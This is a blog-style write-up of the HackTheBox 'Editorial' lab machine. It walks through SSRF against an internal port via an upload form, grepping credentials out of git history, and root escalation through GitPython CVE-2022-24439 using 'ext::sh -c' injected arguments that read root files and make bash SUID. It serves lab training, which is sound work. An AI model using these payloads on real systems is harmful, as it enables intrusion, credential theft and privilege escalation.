Post

HackTheBox Editorial Writeup

Posted
By x3ric
3 min read

Explore the fundamentals of cybersecurity in the Editorial Capture The Flag (CTF) challenge, an easy-level experience, ideal for beginners! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible and perfect for those new to CTFs.

Add Hosts

Edit the /etc/hosts file and add the following entries:

1

10.10.11.20 editorial.htb

Script to add hosts automatically

1
2
3

ip="10.10.11.20"
domain="editorial.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV editorial.htb

1
2
3
4
5
6
7
8
9
10
11
12
13

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-22 21:06 CEST
Nmap scan report for tiempoarriba.htb (10.10.11.20)
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_  256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Editorial Tiempo Arriba
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploiting Port 5000 on editorial.htb

First, intercept the request to upload a file using Burp Suite by navigating to http://editorial.htb/upload.

Step 1: Brute Force Port 5000

Port 5000 was identified using Burp Suite’s repeater. By sending crafted requests, you can attempt to brute force internal endpoints on port 5000. In the request, use http://127.0.0.1:5000/ as the bookurl. You can then inspect the image preview to download any available files.

Here’s an example request for the brute force:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------345673946433514815222539054036
Content-Length: 365
Origin: http://editorial.htb
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://editorial.htb/upload
Priority: u=0

-----------------------------345673946433514815222539054036
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/
-----------------------------345673946433514815222539054036
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream

-----------------------------345673946433514815222539054036--

Step 2: Fetch and Inspect Files

Once you successfully brute force and discover an endpoint, you can fetch the exposed file by following the steps below:

The endpoint will be shown in the response to the POST /upload-cover request.

1
2
3
4
5

echo -n "Endpoint -->"
read endpoint
wget http://editorial.htb/static/uploads/$endpoint
cat $endpoint | jq
rm -rf $endpoint

This will retrieve the file, which could reveal valuable information like additional API endpoints.

Step 3: Exploit Another Endpoint

Target endpoint http://127.0.0.1:5000/api/latest/metadata/messages/authors by following the same steps to extract sensitive information.

Step 4: SSH Access

Once you gather enough information, SSH into the editorial.htb server:

1
2

ssh dev@editorial.htb
cat user.txt

Step 5: Git Inspection

Navigate to the apps directory to inspect the git history and reset to a previous commit:

1
2
3
4

cd apps
git log
git reset --hard HEAD^  # Go back 1 commit
git log --all -p        # Show all commit diffs

Step 6: Extract Credentials

To automatically extract credentials from git commit diffs, use the following command:

1

echo -e "$(git log --all -p | grep -Eo "Username:.*|Password:.*" | awk 'NR==1{print; exit}')"

Step 7: Privilege Escalation

Switch to the prod user and check available sudo commands:

1
2

su prod
sudo -l

You will find:

1
2

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

Step 8: Exploiting GitPython CVE

Using CVE-2022–24439, exploit the command to escalate privileges and read the root flag:

1
2

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cat% /root/root.txt% >% /tmp/root'
cat /tmp/root

Getting an actual root shell

1
2

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c chmod% 4755% /bin/bash'
/bin/bash -p
ctf
htb cft writeup linux cve-2022–24439
This post is licensed under CC BY 4.0 by the author.